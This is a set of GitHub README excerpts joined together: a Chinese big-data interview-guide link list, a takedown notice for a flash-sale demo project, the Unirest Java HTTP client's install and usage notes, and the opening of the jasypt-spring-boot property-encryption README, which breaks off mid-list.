[腾讯TEG-数据平台部-大数据开发实习-二面(等凉)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG-%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E9%83%A8-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0-%E4%BA%8C%E9%9D%A2%EF%BC%88%E7%AD%89%E5%87%89%EF%BC%89.pdf) [腾讯TEG大数据一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯teg大数据 凉](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFteg%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E5%87%89.pdf) [腾讯云智 数据工程 面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA%20%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%20%E9%9D%A2%E7%BB%8F.pdf) [腾讯云智暑期实习-数据工程 一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0-%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%20%E4%B8%80%E9%9D%A2.pdf) [腾讯大数据开发一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [腾讯大数据开发实习](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0.pdf) 
[腾讯微保实习一面(数据开发工程师)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%9D%E5%AE%9E%E4%B9%A0%E4%B8%80%E9%9D%A2%EF%BC%88%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%89.pdf) [腾讯微保实习二面(数据开发工程师)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%9D%E5%AE%9E%E4%B9%A0%E4%BA%8C%E9%9D%A2%EF%BC%88%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%89.pdf) [腾讯微信读书 数据科学 暑期实习 一面【放弃笔试但被捞】](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%A1%E8%AF%BB%E4%B9%A6%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%20%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E4%B8%80%E9%9D%A2%E3%80%90%E6%94%BE%E5%BC%83%E7%AC%94%E8%AF%95%E4%BD%86%E8%A2%AB%E6%8D%9E%E3%80%91.pdf) [腾讯数开面筋-全程无八股](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E5%BC%80%E9%9D%A2%E7%AD%8B-%E5%85%A8%E7%A8%8B%E6%97%A0%E5%85%AB%E8%82%A1.pdf) [腾讯数据工程凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E5%87%89%E7%BB%8F.pdf) [腾讯数据工程面经(1)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E9%9D%A2%E7%BB%8F%EF%BC%881%EF%BC%89.pdf) [腾讯数据工程面经(2)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E9%9D%A2%E7%BB%8F%EF%BC%882%EF%BC%89.pdf) [腾讯暑期实习 数据科学一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯秋招大数据运维开发一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E7%A7%8B%E6%8B%9B%E5%A4%A7%E6%95%B0%E6%8D%AE%E8%BF%90%E7%BB%B4%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2.pdf) 
[阿里、腾讯大数据提前批面经(已拿offer)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E9%98%BF%E9%87%8C%E3%80%81%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%8F%90%E5%89%8D%E6%89%B9%E9%9D%A2%E7%BB%8F(%E5%B7%B2%E6%8B%BFoffer).pdf) [面试复盘|腾讯-腾讯大数据 一面凉经!!!](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E9%9D%A2%E8%AF%95%E5%A4%8D%E7%9B%98%EF%BD%9C%E8%85%BE%E8%AE%AF-%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F%EF%BC%81%EF%BC%81%EF%BC%81.pdf) #### 小米面经 [2023-3-27 小米-汽车-大数据开发](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/2023-3-27%20%E5%B0%8F%E7%B1%B3-%E6%B1%BD%E8%BD%A6-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91-1.pdf) [小米 大数据 一面 二面(凉经)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E4%B8%80%E9%9D%A2%20%E4%BA%8C%E9%9D%A2%EF%BC%88%E5%87%89%E7%BB%8F%EF%BC%89.pdf) [小米 大数据开发 一面视频面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E4%B8%80%E9%9D%A2%E8%A7%86%E9%A2%91%E9%9D%A2.pdf) [小米 大数据开发 已oc](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E5%B7%B2oc.pdf) [小米、头条、知乎面试题总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E3%80%81%E5%A4%B4%E6%9D%A1%E3%80%81%E7%9F%A5%E4%B9%8E%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93_%E4%B8%8D%E6%B8%85%E4%B8%8D%E6%85%8E%E7%9A%84%E5%8D%9A%E5%AE%A2-CSDN%E5%8D%9A%E5%AE%A2.pdf) [小米凉面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%87%89%E9%9D%A2.pdf) [小米大数据一二面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2.pdf) [小米大数据一二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [小米大数据一二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F02.pdf) 
[小米大数据开发一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2.pdf) [小米大数据开发一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [小米大数据开发二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [小米大数据开发实习面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F.pdf) [小米大数据开发岗一面、二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B2%97%E4%B8%80%E9%9D%A2%E3%80%81%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [小米大数据开发工程师(base北京)已OC](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%88base%E5%8C%97%E4%BA%AC%EF%BC%89%E5%B7%B2OC.pdf) [小米大数据开发面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E9%9D%A2%E7%BB%8F.pdf) [小米大数据提前批一面二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%8F%90%E5%89%8D%E6%89%B9%E4%B8%80%E9%9D%A2%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [小米大数据日常实习一二三面(已oc)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%97%A5%E5%B8%B8%E5%AE%9E%E4%B9%A0%E4%B8%80%E4%BA%8C%E4%B8%89%E9%9D%A2%EF%BC%88%E5%B7%B2oc%EF%BC%89.pdf) [小米大数据日常面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%97%A5%E5%B8%B8%E9%9D%A2%E7%BB%8F.pdf) [小米大数据研发(已OC)timeline](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%EF%BC%88%E5%B7%B2OC%EF%BC%89timeline.pdf) [小米大数据面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F.pdf) 
[Xiaomi interview write-up, waiting to hear back about the second round](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E9%9D%A2%E7%BB%8F%EF%BC%8C%E4%BA%8C%E9%9D%A2%E7%AD%89%E9%80%9A%E7%9F%A5%E4%B8%AD%E3%80%82.pdf)

Big data & backend books
---
For PDF books (including Hadoop, Spark, Flink, and other big data books), reply with the keyword "大数据书籍" or "Java书籍" to the official account and save them yourself from the Baidu cloud-drive group.

## Chat group

The chat group is set up; to join, add me on WeChat: **MoRan1607, note: GitHub**

<p align="center"> <img src="https://github.com/Dr11ft/BigDataGuide/blob/master/Pics/%E5%BE%AE%E4%BF%A1.jpg" width="200" height="200"/> <p align="center"> </p> </p>
0
qiurunze123/miaosha
⭐⭐⭐⭐ Flash-sale ("seckill") system design and implementation. Advanced study and analysis for internet engineers 🙋🐓
null
![Internet Java flash-sale system design and architecture](https://raw.githubusercontent.com/qiurunze123/imageall/master/miaoshashejitu.png)

> Friends, thank you all for supporting my articles. Time flies; this content was written a few years ago when I had just graduated, and it was only a personal project. After a public-account article tore into it (I read the author's post and wrote a brief reply when I got home that night), I thought it over: since I really have no energy to maintain it, and it could mislead beginners, I decided to take the project offline. It was my first project, so let it become a memory, and spare myself the trouble! You can still reach me on WeChat to discuss other questions, and I will answer when I have time!

> 1. Take it rationally. My intention was to express some of my own ideas and directions. Because of the surge in stars, I made an initial round of planning; I had not been out of school for long then, and I was honored to see this grow from a small project into a big one, but it was all immature thinking at the time. The project was never fully finished; it was only an entry-level project for my own practice, meant for learning more. So when you look at this project, bring more of your own thinking and filtering, and do not copy it blindly! Finally, for the less rational readers, I recommend two books, 《我就是你啊》 and 《非暴力沟通》 (Nonviolent Communication); they might help you evolve!
0
Kong/unirest-java
Unirest in Java: Simplified, lightweight HTTP client library.
null
# Unirest for Java

[![Actions Status](https://github.com/kong/unirest-java/workflows/Verify/badge.svg)](https://github.com/kong/unirest-java/actions) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.konghq/unirest-java-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.kong/unirest-java) [![Javadocs](http://www.javadoc.io/badge/com.konghq/unirest-java-core.svg)](http://www.javadoc.io/doc/com.konghq/unirest-java)

## Unirest 4

Unirest 4 is built on modern Java standards, and as such requires at least Java 11.

Unirest 4's dependencies are fully modular, and have been moved to new Maven coordinates to avoid conflicts with the previous versions. You can use a Maven BOM to manage the modules:

### Install With Maven

```xml
<dependencyManagement>
    <dependencies>
        <!-- https://mvnrepository.com/artifact/com.konghq/unirest-java-bom -->
        <dependency>
            <groupId>com.konghq</groupId>
            <artifactId>unirest-java-bom</artifactId>
            <version>4.3.1</version>
            <type>pom</type>
            <scope>import</scope>
        </dependency>
    </dependencies>
</dependencyManagement>

<dependencies>
    <!-- https://mvnrepository.com/artifact/com.konghq/unirest-java-core -->
    <dependency>
        <groupId>com.konghq</groupId>
        <artifactId>unirest-java-core</artifactId>
    </dependency>

    <!-- pick a JSON module if you want to parse JSON. Include one of these: -->
    <!-- Google GSON -->
    <dependency>
        <groupId>com.konghq</groupId>
        <artifactId>unirest-modules-gson</artifactId>
    </dependency>

    <!-- OR maybe you like Jackson better? -->
    <dependency>
        <groupId>com.konghq</groupId>
        <artifactId>unirest-modules-jackson</artifactId>
    </dependency>
</dependencies>
```

#### 🚨 Attention JSON users 🚨

Under Unirest 4, core no longer comes with ANY transitive dependencies, and because Java itself lacks a JSON parser you MUST declare a JSON implementation if you wish to do object mappings or use Json objects.

## Upgrading from Previous Versions

See the [Upgrade Guide](UPGRADE_GUIDE.md)

## ChangeLog

See the [Change Log](CHANGELOG.md) for recent changes.

## Documentation

Our [Documentation](http://kong.github.io/unirest-java/)

## Unirest 3

### Maven

```xml
<!-- Pull in as a traditional dependency -->
<dependency>
    <groupId>com.konghq</groupId>
    <artifactId>unirest-java</artifactId>
    <version>3.14.1</version>
</dependency>
```
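With the dependencies above in place, basic usage looks like the following minimal sketch. The target URL is just a placeholder; the imports assume the Unirest 4 coordinates, where the core package moved to `kong.unirest.core` (on Unirest 3 the equivalent import is `kong.unirest.Unirest`):

```java
import kong.unirest.core.HttpResponse;
import kong.unirest.core.JsonNode;
import kong.unirest.core.Unirest;

public class UnirestExample {
    public static void main(String[] args) {
        // Simple GET, reading the body as a String.
        HttpResponse<String> asText = Unirest.get("https://httpbin.org/get")
                .header("Accept", "application/json")
                .queryString("q", "unirest")
                .asString();
        System.out.println(asText.getStatus() + " -> " + asText.getBody());

        // The same call parsed as JSON; per the note above, this requires one
        // of the JSON modules (GSON or Jackson) on the classpath.
        HttpResponse<JsonNode> asJson = Unirest.get("https://httpbin.org/get").asJson();
        System.out.println(asJson.getBody().getObject().toString());

        Unirest.shutDown(); // release the connection pool when finished
    }
}
```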
0
ulisesbocchio/jasypt-spring-boot
Jasypt integration for Spring boot
encryptable-properties encryption java java-8 java8 security spring spring-boot spring-boot-2 spring-boot-starter spring-boot2 web webapp website
# jasypt-spring-boot

**[Jasypt](http://www.jasypt.org)** integration for Spring Boot 2.x and 3.0.0

[![Build Status](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot.svg?branch=master)](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot)
[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/ulisesbocchio/jasypt-spring-boot?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot)
[![Code Climate](https://codeclimate.com/github/rsercano/mongoclient/badges/gpa.svg)](https://codeclimate.com/github/ulisesbocchio/jasypt-spring-boot)
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/6a75fc4e1d3f480f811b5339202400b5)](https://www.codacy.com/app/ulisesbocchio/jasypt-spring-boot?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=ulisesbocchio/jasypt-spring-boot&amp;utm_campaign=Badge_Grade)
[![GitHub release](https://img.shields.io/github/release/ulisesbocchio/jasypt-spring-boot.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot)
[![Github All Releases](https://img.shields.io/github/downloads/ulisesbocchio/jasypt-spring-boot/total.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot)
[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](https://github.com/ulisesbocchio/jasypt-spring-boot/blob/master/LICENSE)
[![volkswagen status](https://auchenberg.github.io/volkswagen/volkswargen_ci.svg?v=1)](https://github.com/ulisesbocchio/jasypt-spring-boot)
[![Paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=9J2V5HJT8AZF8)
[!["Buy Me A Coffee"](https://www.buymeacoffee.com/assets/img/custom_images/yellow_img.png)](https://www.buymeacoffee.com/ulisesbd)

Jasypt Spring Boot provides Encryption support for property sources in Spring Boot Applications.<br/>
There are 3 ways to integrate `jasypt-spring-boot` into your project:

- Simply adding the starter jar `jasypt-spring-boot-starter` to your classpath if using `@SpringBootApplication` or `@EnableAutoConfiguration` will enable encryptable properties across the entire Spring Environment
- Adding `jasypt-spring-boot` to your classpath and adding `@EnableEncryptableProperties` to your main Configuration class to enable encryptable properties across the entire Spring Environment
- Adding `jasypt-spring-boot` to your classpath and declaring individual encryptable property sources with `@EncryptablePropertySource`

## What's new?

### Go to [Releases](https://github.com/ulisesbocchio/jasypt-spring-boot/releases)

## What to do First?

Use one of the following 3 methods (briefly explained above):

1. Simply add the starter jar dependency to your project if your Spring Boot application uses `@SpringBootApplication` or `@EnableAutoConfiguration` and encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, application-*.properties, yaml properties, and any other property sources can contain encrypted properties):

```xml
<dependency>
    <groupId>com.github.ulisesbocchio</groupId>
    <artifactId>jasypt-spring-boot-starter</artifactId>
    <version>3.0.5</version>
</dependency>
```

2.
